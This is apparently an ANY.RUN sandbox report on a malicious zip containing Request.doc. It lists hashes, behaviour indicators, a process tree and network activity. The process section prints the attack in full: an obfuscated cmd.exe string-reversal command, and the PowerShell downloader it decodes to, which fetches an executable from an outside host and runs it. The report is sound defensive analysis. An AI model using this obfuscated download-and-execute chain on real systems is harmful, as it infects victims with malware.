analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

12_Request.zip

Full analysis: https://app.any.run/tasks/444644d4-796f-4a37-b4d9-d7bc2a6c6751
Verdict: Malicious activity
Analysis date: December 18, 2018, 19:32:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
maldoc-4
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

D5B68BF88670C1E16C5332DBFFE78533

SHA1:

9E3FAB4F455B6F1816A7D00629FA402672EAC715

SHA256:

8E3BC81FBACBC79DA40E4C13E543C1A9BB7EF3A1E4CD37BF2475861F50FC6783

SSDEEP:

768:4Xoghg1/eJLPNB3tXo+Q0BDYR3LvkjB9t1Hsg2qfXfufhjTa38gmc0ud:4t6UL1BBoJUYR3IjBH+g2qXGKQc0ud

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3656)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 4068)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4068)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3404)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3044)
    • Creates files in the user directory

      • powershell.exe (PID: 3356)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4068)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4068)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2018:12:18 13:16:08
ZipCRC: 0xb838c4e4
ZipCompressedSize: 41602
ZipUncompressedSize: 68480
ZipFileName: Request.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3404"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\12_Request.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
4068"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3404.10071\Request.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3044c:\cnEjnPKpk\uAQwtHFWhq\WmsndTaV\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set gmBu=;'iLT'=jCC$}}{hctac}};kaerb;'Rcj'=dRM$;Rmu$ metI-ekovnI{ )00008 eg- htgnel.)Rmu$ metI-teG(( fI;'kzv'=CwE$;)Rmu$ ,BhR$(eliFdaolnwoD.aDS${yrt{)vBp$ ni BhR$(hcaerof;'exe.'+Hjd$+'\'+pmet:vne$=Rmu$;'DUw'=wAB$;'972' = Hjd$;'SLK'=Wks$;)'@'(tilpS.'sdd.8onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=vBp$;tneilCbeW.teN tcejbo-wen=aDS$;'DXA'=ZpC$ llehsrewop&&for /L %z in (355,-1,0)do set 1OKd=!1OKd!!gmBu:~%z,1!&&if %z leq 0 call %1OKd:*1OKd!=%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3656CmD /V:O/C"set gmBu=;'iLT'=jCC$}}{hctac}};kaerb;'Rcj'=dRM$;Rmu$ metI-ekovnI{ )00008 eg- htgnel.)Rmu$ metI-teG(( fI;'kzv'=CwE$;)Rmu$ ,BhR$(eliFdaolnwoD.aDS${yrt{)vBp$ ni BhR$(hcaerof;'exe.'+Hjd$+'\'+pmet:vne$=Rmu$;'DUw'=wAB$;'972' = Hjd$;'SLK'=Wks$;)'@'(tilpS.'sdd.8onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=vBp$;tneilCbeW.teN tcejbo-wen=aDS$;'DXA'=ZpC$ llehsrewop&&for /L %z in (355,-1,0)do set 1OKd=!1OKd!!gmBu:~%z,1!&&if %z leq 0 call %1OKd:*1OKd!=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3356powershell $CpZ='AXD';$SDa=new-object Net.WebClient;$pBv='http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino8.dds'.Split('@');$skW='KLS';$djH = '279';$BAw='wUD';$umR=$env:temp+'\'+$djH+'.exe';foreach($RhB in $pBv){try{$SDa.DownloadFile($RhB, $umR);$EwC='vzk';If ((Get-Item $umR).length -ge 80000) {Invoke-Item $umR;$MRd='jcR';break;}}catch{}}$CCj='TLi';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 880
Read events
1 407
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
4068WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD576.tmp.cvr
MD5:
SHA256:
4068WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14024468.wmf
MD5:
SHA256:
4068WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54EDEEB6.wmf
MD5:
SHA256:
3356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U3L2TOVSDB9ZJB08H0KT.temp
MD5:
SHA256:
3356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
4068WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5112490DCC0FA197D6650B4D07026AD1
SHA256:FD448E7DF779239C1DB6632ECA53967B05B5B04EA424962EED2194DAB5A5AEA8
4068WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9986E949.wmfwmf
MD5:9C24317F00BE4848CA4DB594C6900F66
SHA256:F7310962D6E09BC16B1ED27EED0393196D875DEA05A081070D660681738A33FC
4068WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:E5526C33D8211770CD877C0D498D2544
SHA256:6C061D8CD83076FE0479C3CCD2A757E4B2688194A0A71709E8204ADC40D47D05
3404WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb3404.10071\Request.docdocument
MD5:D8DDA7B90E759FF8B4749558B3CDB4CC
SHA256:876B15794D9722581D638C1034A5E1373C1E27FD8CFE4195C6D21B98BEAA849D
3356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19e63f.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3356
powershell.exe
GET
404
205.185.120.136:80
http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino8.dds
US
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3356
powershell.exe
205.185.120.136:80
iscondisth.com
FranTech Solutions
US
suspicious

DNS requests

Domain
IP
Reputation
iscondisth.com
  • 205.185.120.136
suspicious

Threats

No threats detected
No debug info